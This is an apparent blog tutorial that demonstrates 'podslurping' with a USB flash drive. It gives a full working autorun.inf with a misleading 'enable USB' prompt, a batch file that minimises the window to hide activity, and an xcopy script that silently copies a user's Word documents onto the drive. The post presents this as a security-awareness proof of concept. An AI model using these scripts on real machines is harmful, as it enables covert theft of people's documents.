How to: Simple “Podslurping” Example With a USB Flash Drive
Download
There has been a lot of talk about “Podslurping” as a new endpoint security threat. Podslurping involves the use of a removable media device, such as an iPod (hence the name) to copy documents from a computer to the removable storage device. Abe Usher introduced the concept a while back and developed a proof of concept as well as another version which only audited the system and made a list of documents the application could have copied.
But really all Podslurping involves is copying files from one place to another. However, to do this you do not really need to develop any sort of special application as Windows has functions built right in, just create a simple batch file using xcopy. Let’s build on the autorun tutorial from last week. We will create an autorun.inf file that calls a couple of batch files.
First create an autorun.inf file that looks like this:
icon=lilguy.ico
open=start.bat
action=Click “OK” to enable USB flash drive
shell\open\command=start.bat
So we will go ahead and use the autorun tricks we learned last week to both prompt the user to run the application, or to automatically run if double clicked. In a actual attack where a malicious user is attempting to steal information from a system they will probably take advantage of the U3 autorun hack so that it runs more quickly, but since we are just showing a proof of concept we don’t need this.
So you will notice that the autorun.inf executes the start.bat file. This file I am going to use to do two things, load the actual slurping batch file commands as well as hide the command prompt my minimizing it, this would help hide exactly what I am doing:
@start /min slurp.bat /B
@exit
The next script we will create the script that will actually copy files. For this example, imagine that I just want to copy all Word documents from the target users “My Documents” directory:
mkdir %~d0\%computername%
xcopy “C:\Documents and Settings\%username%\My Documents\*.doc” %~d0\%computername% /s/c/q/r/h
@cls
@exit
First I create a directory on my USB flash drive. The “%~d0″ here is a Windows variable that you can use which will output the drive from which the script is currently running. So I tell it to create a directory on my Flash drive and to name the directory the computer’s name, this is just in case I am auditing multiple systems. The xcopy command I have here will then start copying any file with a “.doc” extension it finds, it will descend into subdirectories as well as copy the subdirectories in the same tree as the actual “My Documents” directory it is copying from.
This is just a quick example of podslurping and just how simple it really is. However, there are more malicious podslurping tools out there which do a better job of searching for specific files of value, hide themselves better and even run in the background on startup not just loading files to a USB flash drive, but actually sending files offsite either view email, FTP and even VNC.